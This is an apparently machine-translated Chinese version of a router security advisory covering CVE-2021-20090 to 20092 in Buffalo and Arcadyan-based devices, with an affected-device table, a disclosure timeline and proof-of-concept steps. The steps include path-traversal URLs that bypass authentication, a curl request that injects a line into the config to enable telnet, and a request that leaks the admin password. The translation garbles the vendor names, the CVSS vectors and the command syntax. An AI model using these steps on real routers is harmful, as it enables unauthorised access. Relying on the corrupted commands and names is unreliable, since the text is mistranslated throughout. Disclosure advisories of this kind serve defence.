多个漏洞在布法罗和Arcadyan路由器
高剧情简介
站得住脚的发现了多个漏洞Arcadyan生产的路由器。
在信息披露过程中发现的问题水牛路由器,站得住脚的发现cve - 2021 - 20090影响更多的设备,作为脆弱性的根源存在于底层Arcadyan固件。
请注意,cve - 2021 2021 - 20092 - 20091和cve -只有被证实在布法罗wsr - 2533模型。
cve - 2021 - 20090
:路径遍历
CVSSv3基础分数:8.1
CVSSv3向量:AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:H: H
路径遍历脆弱性的web界面由Arcadyan制造网络设备,包括布法罗wsr - 2533 dhpl2固件版本< = 1.02和wsr - 2533 dhp3固件版本< = 1.24,可以允许未经身份验证的远程攻击者绕过身份验证。
这个漏洞也被证实影响以下设备
注意:列出的固件版本不显示最新的固件版本的影响,只有被确认的固件版本问题。
有关更多信息,请联系设备各自的供应商。
供应商 |
设备 |
发现版本 |
亚洲开发银行 |
宽带无线网络成瘾的路由器 |
1.26 s-r-3p |
Arcadyan |
ARV7519 |
00.96.00.96.617ES |
Arcadyan |
VRV9517 |
6.00.17 build04 |
Arcadyan |
VGV7519 |
3.01.116 |
Arcadyan |
VRV9518 |
1.01.00 build44 |
ASMAX |
BBR-4MG / SMC7908 ADSL |
0.08 |
华硕 |
DSL-AC88U(弧VRV9517) |
1.10.05 build502 |
华硕 |
DSL-AC87VG(弧VRV9510) |
1.05.18 build305 |
华硕 |
DSL-AC3100 |
1.10.05 build503 |
华硕 |
DSL-AC68VG |
5.00.08 build272 |
直线 |
智能箱闪光 |
1.00.13_beta4 |
英国电信公司 |
WE410443-SA |
1.02.12 build02 |
水牛 |
wsr - 2533 dhpl2 |
1.02 |
水牛 |
wsr - 2533 dhp3 |
1.24 |
水牛 |
BBR-4HG |
|
水牛 |
BBR-4MG |
2.08版0002 |
水牛 |
wsr - 3200大举裁员 |
1.1 |
水牛 |
wsr - 1166 dhp2 |
1.15 |
水牛 |
wxr - 5700 ax7s |
1.11 |
德国电信 |
Speedport智能3 |
010137.4.8.001.0 |
HughesNet |
HT2000W |
0.10.10 |
KPN |
ExperiaBox V10A (Arcadyan VRV9517) |
5.00.48 build453 |
KPN |
VGV7519 |
3.01.116 |
O2 |
HomeBox 6441 |
1.01.36 |
橙色 |
LiveBox纤维(PRV3399) |
00.96.00.96.617ES |
瘦 |
智能调制解调器(Arcadyan VRV9517) |
6.00.16 build01 |
SparkNZ |
智能调制解调器(Arcadyan VRV9517) |
6.00.17 build04 |
电信(阿根廷) |
Arcadyan VRV9518VAC23-A-OS-AM |
1.01.00 build44 |
墨西哥电话公司 |
PRV33AC |
1.31.005.0012 |
墨西哥电话公司 |
VRV7006 |
|
澳洲电信 |
智能调制解调器Gen 2 (LH1000) |
0.13.01r |
阿兰 |
无线网络中心(PRV65B444A-S-TS) |
v3.00.20 |
阿兰 |
NH20A |
1.00.10debug build06 |
威瑞森 |
Fios G3100 |
2.0.0.6 |
沃达丰(Vodafone) |
EasyBox 904 |
4.16 |
沃达丰(Vodafone) |
EasyBox 903 |
30.05.714 |
沃达丰(Vodafone) |
EasyBox 802 |
20.02.226 |
的概念:
由于存在安全漏洞的文件夹列表属于一个“绕过列表”进行身份验证。列出的设备,这意味着该漏洞可以触发多个路径。最简单的例子是:
设备中http:// < ip > /你需要身份验证,攻击者可以访问你可以使用以下路径:
- http:// < ip > /图片/…% 2 findex.htm
- http:// < ip > / js /…% 2 findex.htm
- http:// < ip > / css /…% 2 findex.htm
页面加载正确的,你将需要使用代理/替换匹配设置,以确保任何资源加载还需要验证利用遍历的路径。此外,某些文件(那些发现在/ cgi /)需要csrf(命名httoken在这些设备上)令牌和一个有效的推荐人头,如果推荐人包括将导致一个错误% 2 f . .遍历(可以匹配/替换)。
cve - 2021 - 20091
:
配置文件注入
CVSSv3基础分数:7.5
CVSSv3向量:AV: N /交流:H /公关:L / UI: N / S: U / C: H /我:H: H
水牛wsr - 2533的web界面dhpl2固件版本< = 1.02和wsr - 2533 dhp3 < = 1.24固件版本不正确清洁用户输入。经过身份验证的远程攻击者可以利用这个漏洞来改变设备配置,可能获得远程代码执行。
的概念:
通过从注射出现在参数apply_abstract.cgi设备的全球配置文件。假设用户登录(或者,或者,可以更改url /图片/…% 2 fapply_abstract。cgi,利用遍历的路径),下面的命令可以用来使注入一条线配置文件telnetd。
curl——包括- x发布http:// < ip > / apply_abstract。cgi - h”推荐人:http:// < ip > /平。html”——数据”action = start_ping&httoken = <有效httoken > &submit_button = ping.html&action_params = blink_time % 3 d5&arc_ping_ipaddress = < ip > % 0 aarc_sys_telnetdenable = 1 &arc_ping_status = 0 &tmp_ping_type = 4”
的% 0 a将被视为一个换行符当萍地址添加到/ tmp / etc / config / .glbcfg。在重启时,shell将在端口23。
cve - 2021 - 20092:
访问控制不当
CVSSv3基础分数:5.9
CVSSv3向量:AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:N: N
水牛wsr - 2533的web界面dhpl2固件版本< = 1.02和wsr - 2533 dhp3固件版本< = 1.24不适当限制对敏感信息的访问未经授权的演员。
的概念:
- 得到一个有效的httoken,导航到http:// < ip设备> / loginerror。html在现代浏览器chrome浏览器(测试)。
- 打开DevTools
- 在控制台运行getToken ()。
- 复制令牌,并使用以下命令从一个终端:
旋度美元——包括“http://192.168.11.1/cgi/cgi_i_filter.js?_tn = 442853667“- h”推荐人:http://192.168.11.1/loginerror.html "
HTTP / 1.1 200 OK日期:星期一,2020年1月13日格林尼治时间15:24:03服务器:Arcadyan httpd 1.0 - type:应用程序/ x-javascript X-FRAME-OPTIONS: SAMEORIGIN连接:紧密演示/ * * / var login_password =“< admin密码>”;addCfg (“lan_ipaddr”0“192.168.11.1”);
解决方案
客户应该寻求更新和缓解来自各自的供应商的信息。
额外的引用
披露时间表
2021年1月24日—站得住脚的报告漏洞水牛日本(buffalo.jp)
2021年1月28日-站得住脚的试图报告漏洞野牛群(buffalo-technology.com)
2021年2月4日,成立报告漏洞美洲水牛(buffalotech.com)
2021年2月9日—日本支持确认和升级野牛
2021年2月24日—野牛日本确认漏洞,通知站得住脚的他们正致力于一个补丁
2021年4月14日——水牛告诉站得住脚的,他们将在4月26日公布
2021年4月21日—站得住脚的通知Verizon,沃达丰、O2(电信),Hughesnet
2021年4月22日—站得住脚的告知Arcadyan,多个供应商使用他们的设备受到影响
2021年4月25日—Arcadyan证实了漏洞,他们正在与一个供应商来修复
2021年4月25日—站得住脚的问Arcadyan可以确定一个可能受到影响的供应商列表,如果他们帮助这些供应商来解决这个问题。(Arcadyan停止响应)
2021年4月26日—咨询最初出版
2021年5月18日—站得住脚的发现更多的受影响的供应商,并决定报告CERT协调中心吗
2021年5月19日- CERT协调中心打开案例在文斯协助报告和信息披露
2021年7月20日-咨询与额外的模型更新受到cve - 2021 - 20090
风险信息
成立咨询ID
交易- 2021 - 13所示
信贷
埃文·格兰特
CVSSv2基地/时间的分数
9.3
CVSSv2向量
AV: N /交流:M /非盟:N / C: C / I: C / A: C
CVSSv3基地/时间的分数
8.1
CVSSv3向量
AV: N /交流:H /公关:UI: N / N / S: U / C: H /我:H: H
风险因素
高
咨询时间
2021年4月26日,首次出版
4月27日2021 -添加引用,更新的解决方案
2021年5月18日-更新格式咨询标识符
2021年7月20日加入列表供应商受到cve - 2021 - 20090
2021年8月03 - poc补充道
2021年8月04 -添加额外的引用。纠正了错误。